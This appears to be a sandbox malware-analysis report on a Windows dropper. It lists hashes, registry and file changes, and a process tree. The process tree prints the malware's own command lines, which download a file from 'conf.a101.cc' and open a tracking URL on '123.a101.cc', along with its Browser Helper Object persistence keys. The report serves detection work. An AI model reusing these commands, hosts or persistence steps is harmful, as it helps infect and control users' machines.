Analysis
-
max time kernel
147s -
max time network
156s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
29/10/2022, 15:05
Static task
static1
Behavioral task
behavioral1
Sample
c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe
Resource
win7-20220901-en
General
-
Target
c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe
-
Size
6.4MB
-
MD5
672c0269ab4d5654b3cbb557704930d9
-
SHA1
0f67282f9ffe0b35dfd9e5ad0274e8429de0c92a
-
SHA256
c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176
-
SHA512
bba3001c8c4f9b0ca2727b474ec982d5ef1db61ac3eac4f36c8c02218b69bc73a35f56eec64d61141242cbc061faa5918a9015f9c7c511ec7704d522cfbaed75
-
SSDEEP
196608:kUR7CeGpduMy6AxLcbStzPMyxdLCr/eG2MPlPicG0ulO:kWNH6SEyxdLCr/JPlPm02O
Malware Config
Signatures
-
Executes dropped EXE 6 IoCs
pid Process 1316 kuaibo.exe 1236 qvodupdate.exe 1792 qvodkunbang.exe 1988 BaiduP2PService.exe 1516 sr.exe 1660 BaiduP2PService.exe -
Loads dropped DLL 22 IoCs
pid Process 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 1316 kuaibo.exe 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 1236 qvodupdate.exe 1236 qvodupdate.exe 1236 qvodupdate.exe 1236 qvodupdate.exe 1236 qvodupdate.exe 1236 qvodupdate.exe 1236 qvodupdate.exe 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 1792 qvodkunbang.exe 1792 qvodkunbang.exe 1792 qvodkunbang.exe 1988 BaiduP2PService.exe 1988 BaiduP2PService.exe 1988 BaiduP2PService.exe 1792 qvodkunbang.exe 1660 BaiduP2PService.exe 1660 BaiduP2PService.exe 1660 BaiduP2PService.exe -
Installs/modifies Browser Helper Object 2 TTPs 8 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF} qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1} qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1} qvodupdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\NoExplorer = "1" qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3} qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} qvodupdate.exe -
Drops file in Program Files directory 23 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\tools\ qvodkunbang.exe File created C:\Program Files (x86)\tools\BaiduP2PService.exe qvodkunbang.exe File created C:\Program Files (x86)\tools\P2PBase.dll qvodkunbang.exe File opened for modification C:\Program Files (x86)\QvodPlayer\isWrite\ c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe File created C:\Program Files (x86)\QvodPlayer\2.jpg c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe File opened for modification C:\Program Files (x86)\Browser\config.ini qvodkunbang.exe File created C:\Program Files (x86)\tools\P2SBase.dll qvodkunbang.exe File created C:\Program Files (x86)\tools\sr.exe qvodkunbang.exe File created C:\Program Files (x86)\QvodPlayer\1.jpg c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe File created C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe File created C:\Program Files (x86)\QvodPlayer\qvodupdate.exe c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe File created C:\Program Files (x86)\QvodPlayer\kuaibo.exe c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe File opened for modification C:\Program Files (x86)\Browser\config.ini qvodupdate.exe File opened for modification C:\Program Files (x86)\tools\isWrite\ qvodupdate.exe File opened for modification C:\Program Files (x86)\QvodPlayer\ c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe File created C:\Program Files (x86)\QvodPlayer\tools.exe c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe File opened for modification C:\Program Files (x86)\Browser\config.ini kuaibo.exe File opened for modification C:\Program Files (x86)\tools\ qvodupdate.exe File created C:\Program Files (x86)\tools\tools.exe qvodupdate.exe File opened for modification C:\Program Files (x86)\tools\isWrite\ qvodkunbang.exe File created C:\Program Files (x86)\tools\P2PStatReport.dll qvodkunbang.exe File created C:\Program Files (x86)\QvodPlayer\3.jpg c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe File created C:\Program Files (x86)\QvodPlayer\5.jpg c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\AppName = "BaiduP2PService.exe" BaiduP2PService.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\Policy = "3" BaiduP2PService.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048ca5449a4d21846ba8a995ea0abd35a00000000020000000000106600000001000020000000ee2a4eed7c7d94dc40c9f7e5081fcfdc77f4990fe8f0a4bd82f7981756272e0a000000000e800000000200002000000074498d47aef1d627422ac93f1f5d9f257cf5aeca0cd98d27c45ef4532bb5748c900000009b9da60754b55a63b158417dddab36a818a3d6e9399a13d28039044f39046da878bf3dcfa35089c9b1bc9fae935fec5c548e5db8f5af2b6246281cfd2d20b5c8e26a16d9c6486b68cd0a517ed3eb0220353242d70594ae1ffcecb09a59f6b5e2672ba12a700fa9f24e8bccee6cb6ebe9c5068a2321b4fa617419afd4df34b5c664acac625ac8e6242dab918ad5ae32284000000077132c65cce328c132e7c659c27cc060a5ea0155a980b7bc96c3fb48b37173e7dc5765f398f032ae484229f487e61539887b3fbff6132e075a9baeb65d1562c0 IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048ca5449a4d21846ba8a995ea0abd35a0000000002000000000010660000000100002000000046abe95ca5c8a6b55349271646ee789308d8ed4c0244c2eb27c9da91a15f86c5000000000e8000000002000020000000d3771b45eff6c43872abbf44b095e2e2d2d9a32edf16d707eb0e4f70ff4b862d200000009021e7b5777459e3443ad49cd6a83b9d0dd67db831d696d2508e19715a4cb6f340000000ba4d4bf118a25b746faa64ce6dafe6cedbf33fae3123452de4cf85bbc31a8381baef5f00d007cf8c6d53aa5049893e9e25b4cf208274ccbdc5670b8ece19d1fd IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "373841941" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0} BaiduP2PService.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e04a39f7d8ebd801 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{1B47D231-57CC-11ED-9ECC-C253C434FFA8} = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\AppPath = "C:\\Program Files (x86)\\tools" BaiduP2PService.exe -
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_Classes\Local Settings qvodupdate.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1} qvodupdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\ = "AccountProtect Class" qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32 qvodupdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32\ = "C:\\ProgramData\\tools\\bdmanager.dll" qvodupdate.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1236 qvodupdate.exe 1236 qvodupdate.exe 1792 qvodkunbang.exe 1792 qvodkunbang.exe 1792 qvodkunbang.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1236 qvodupdate.exe Token: SeDebugPrivilege 1236 qvodupdate.exe Token: SeDebugPrivilege 1792 qvodkunbang.exe Token: SeDebugPrivilege 1792 qvodkunbang.exe Token: SeDebugPrivilege 1792 qvodkunbang.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 696 IEXPLORE.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 696 IEXPLORE.EXE 696 IEXPLORE.EXE 1976 IEXPLORE.EXE 1976 IEXPLORE.EXE 1976 IEXPLORE.EXE 1976 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 1768 wrote to memory of 1316 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 27 PID 1768 wrote to memory of 1316 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 27 PID 1768 wrote to memory of 1316 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 27 PID 1768 wrote to memory of 1316 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 27 PID 1768 wrote to memory of 1236 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 28 PID 1768 wrote to memory of 1236 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 28 PID 1768 wrote to memory of 1236 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 28 PID 1768 wrote to memory of 1236 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 28 PID 1768 wrote to memory of 1236 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 28 PID 1768 wrote to memory of 1236 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 28 PID 1768 wrote to memory of 1236 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 28 PID 1236 wrote to memory of 1336 1236 qvodupdate.exe 30 PID 1236 wrote to memory of 1336 1236 qvodupdate.exe 30 PID 1236 wrote to memory of 1336 1236 qvodupdate.exe 30 PID 1236 wrote to memory of 1336 1236 qvodupdate.exe 30 PID 1336 wrote to memory of 696 1336 iexplore.exe 31 PID 1336 wrote to memory of 696 1336 iexplore.exe 31 PID 1336 wrote to memory of 696 1336 iexplore.exe 31 PID 1336 wrote to memory of 696 1336 iexplore.exe 31 PID 696 wrote to memory of 1976 696 IEXPLORE.EXE 33 PID 696 wrote to memory of 1976 696 IEXPLORE.EXE 33 PID 696 wrote to memory of 1976 696 IEXPLORE.EXE 33 PID 696 wrote to memory of 1976 696 IEXPLORE.EXE 33 PID 1768 wrote to memory of 1792 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 34 PID 1768 wrote to memory of 1792 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 34 PID 1768 wrote to memory of 1792 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 34 PID 1768 wrote to memory of 1792 1768 c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe 34 PID 1792 wrote to memory of 1988 1792 qvodkunbang.exe 35 PID 1792 wrote to memory of 1988 1792 qvodkunbang.exe 35 PID 1792 wrote to memory of 1988 1792 qvodkunbang.exe 35 PID 1792 wrote to memory of 1988 1792 qvodkunbang.exe 35 PID 1792 wrote to memory of 1516 1792 qvodkunbang.exe 36 PID 1792 wrote to memory of 1516 1792 qvodkunbang.exe 36 PID 1792 wrote to memory of 1516 1792 qvodkunbang.exe 36 PID 1792 wrote to memory of 1516 1792 qvodkunbang.exe 36 PID 1792 wrote to memory of 1660 1792 qvodkunbang.exe 38 PID 1792 wrote to memory of 1660 1792 qvodkunbang.exe 38 PID 1792 wrote to memory of 1660 1792 qvodkunbang.exe 38 PID 1792 wrote to memory of 1660 1792 qvodkunbang.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe"C:\Users\Admin\AppData\Local\Temp\c5f06cb44fda56bb6137b32de80f86f5cc204ab9f274f2d00f36708f57c6b176.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Program Files (x86)\QvodPlayer\kuaibo.exe"C:\Program Files (x86)\QvodPlayer\kuaibo.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:1316
-
-
C:\Program Files (x86)\QvodPlayer\qvodupdate.exe"C:\Program Files (x86)\QvodPlayer\qvodupdate.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Installs/modifies Browser Helper Object
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1236 -
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe" http://123.a101.cc/u.php?id=893⤵
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://123.a101.cc/u.php?id=894⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:696 CREDAT:275457 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1976
-
-
-
-
-
C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe"C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Program Files (x86)\tools\BaiduP2PService.exe"C:\Program Files (x86)\tools\BaiduP2PService.exe" init3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
PID:1988
-
-
C:\Program Files (x86)\tools\sr.exe"C:\Program Files (x86)\tools\sr.exe" "http://conf.a101.cc/tool/install.txt" "C:\ProgramData\Baidu\BaiduPlayer\3⤵
- Executes dropped EXE
PID:1516
-
-
C:\Program Files (x86)\tools\BaiduP2PService.exe"C:\Program Files (x86)\tools\BaiduP2PService.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1660
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.6MB
MD5b47de0ac24fa366a872c1017aec0a309
SHA15bd1323e756a53837585f4cf71c6c6dc20100e8d
SHA2562dd6524e632524b2e1733f1a913158a8243a4c3b6671b568e683aa11922412ca
SHA5128b8ffa12768ecd46ec2e5988ba037680f7e4759ff54b9f7b84637bdb4d1438f6fbadf9f4b3adcebe73f6e6ac9e8639c7e03d4465f1013b8f37a06922ed045d51
-
Filesize
4.6MB
MD5b47de0ac24fa366a872c1017aec0a309
SHA15bd1323e756a53837585f4cf71c6c6dc20100e8d
SHA2562dd6524e632524b2e1733f1a913158a8243a4c3b6671b568e683aa11922412ca
SHA5128b8ffa12768ecd46ec2e5988ba037680f7e4759ff54b9f7b84637bdb4d1438f6fbadf9f4b3adcebe73f6e6ac9e8639c7e03d4465f1013b8f37a06922ed045d51
-
Filesize
748KB
MD5d250e70b1cfa8534fbc7818f719696b4
SHA1e6ed0c53b9f7d09474b579c4e9e93c0d56a465e2
SHA2567e13a77e61c81044507c310617ecf2347d91e1c36e19f0385b7d42e38522ff3f
SHA512bfa5494e65621d41515408c710107385bd6ea3ee59de1b417b6afb15130c2fed99b1dd7aee3283a84e7117d1fd88808325b90fb942e52f4af17374c8eee78709
-
Filesize
748KB
MD5d250e70b1cfa8534fbc7818f719696b4
SHA1e6ed0c53b9f7d09474b579c4e9e93c0d56a465e2
SHA2567e13a77e61c81044507c310617ecf2347d91e1c36e19f0385b7d42e38522ff3f
SHA512bfa5494e65621d41515408c710107385bd6ea3ee59de1b417b6afb15130c2fed99b1dd7aee3283a84e7117d1fd88808325b90fb942e52f4af17374c8eee78709
-
Filesize
365KB
MD5cc297a18126fd9f993dd7ac69cdea5b2
SHA12f5530465b99f66a72ec3205edb3b1d24a8d007a
SHA256b150fab1ae70e4fb95718074df46bb7096bf819ba3e70073a6df96f905706ef9
SHA5120545536eea3828ce2574189aef1825351d61c9237a8ea060ee198fbb030156e6079d71d315004b7710cfcf7befcec10f9bb742dc58ccf346296aad356f260c9f
-
Filesize
365KB
MD5cc297a18126fd9f993dd7ac69cdea5b2
SHA12f5530465b99f66a72ec3205edb3b1d24a8d007a
SHA256b150fab1ae70e4fb95718074df46bb7096bf819ba3e70073a6df96f905706ef9
SHA5120545536eea3828ce2574189aef1825351d61c9237a8ea060ee198fbb030156e6079d71d315004b7710cfcf7befcec10f9bb742dc58ccf346296aad356f260c9f
-
Filesize
508KB
MD5012a8879efa6f8dbc3c6ba58a659fefb
SHA1d2a2dac321ff5a78de52e926044ba362f4004cde
SHA256774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66
SHA512b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba
-
Filesize
508KB
MD5012a8879efa6f8dbc3c6ba58a659fefb
SHA1d2a2dac321ff5a78de52e926044ba362f4004cde
SHA256774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66
SHA512b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba
-
Filesize
508KB
MD5012a8879efa6f8dbc3c6ba58a659fefb
SHA1d2a2dac321ff5a78de52e926044ba362f4004cde
SHA256774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66
SHA512b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba
-
Filesize
496KB
MD5a86a90ba120c455ac0e3655f146d5a0f
SHA1277c55191fbbadf888626df4fba279591632a406
SHA256577790026b949f666546299cd1dd002bc76447b86feed056cfe8c903a8039c43
SHA512a1d1d9386575187a81867db036c59ce76cede87a981fec7462283ccc0f76e0e8c8a85c6e66fd74a4305b6f402c224db9c1525e22015a4400d0bbedd1c72a9d47
-
Filesize
364KB
MD53b14cae0ea1d045bb5b196017913edb3
SHA17ca456595148f2d5e71444a612f2351c4cd8a20d
SHA256a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982
SHA5126c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200
-
Filesize
512KB
MD5894ab861e608eacbac24280ab234368f
SHA1e283ef8757f04b0252ec5dce22e6e8094bed7737
SHA256687df23126f0da0348f8c5165b11b72982636177c6f53f5fe827c3f036fd83bb
SHA51226a78e26a60bfd48e93b1e61ede2cc2a7c9c9cb61bdd729f86b2692fed0eb4fedc72953ca83bc3fc945a0cc21d3d3232e73a03be39ea5755ddcc0dbd8ef3bed3
-
Filesize
154KB
MD583bcf3ad82ce65d2bd0fdd364fe32cb5
SHA132c5080bbf51dd22bed7f594a92f753a25eef73c
SHA2565635105c90c618c8db7a11cc031dbfb91aba92b0b8c960d6fb02f1fb4ff9758d
SHA512852c6176bd92c2fa4d8177764bcf8e6c9acb06cea488972376e6d6acb4e01c02f306f9b73ca36663f1c82b0443049e0898a0d6638a0760f957eade50a6ba8e81
-
Filesize
1KB
MD536074713c80a4f27b0723c7b18834084
SHA142907ded1fd34068e87439ad2f768a224efff473
SHA2561681e43b184ae12336afa5192b64df1faea2a7733c702a1df0e165c745cdde54
SHA512b08e0f090b5c88168f9cd94263fc2c405253918f16eb016d1a0ff54fe7e681b3b5713a61e2e87dfb8386b7eb91444792996c736141c69786f0cdb9073b3361f0
-
Filesize
14KB
MD52b80eb58904a9c76c146128c8039534c
SHA13c34b4c4ee5036ebef3d411c9c16dcb6127718e1
SHA256916fddaa8b1b8418b166668dd1d944c654e1d475b795d2dfb1a863d757f88616
SHA512af18c547228f491e14b25c7a5d3e6e6496cbce6d1128e271028af83f82683c3e8bab8bd475d01c464a8b6524e123f38e2c97b7feb623f839284a3a9ebca5ad3d
-
Filesize
16KB
MD5488d6c9bf535a0634573b5154f680f69
SHA1cbb5675cbef28e6f129e562131bd6a8a4b992fa7
SHA25677d7009486dd643fec8ef886658e8d273457d2568baf025ca9424a641aa3ac94
SHA51212e07657b7aed1c5440cc102b5d2978b08d6796910d84b935b5644de0a42e73b764fd25d4ae6fd985d89180734e1e74722181a6fc64a500dab7963afa88a010e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5446f23493a434d2c03a3c8b73aa782e2
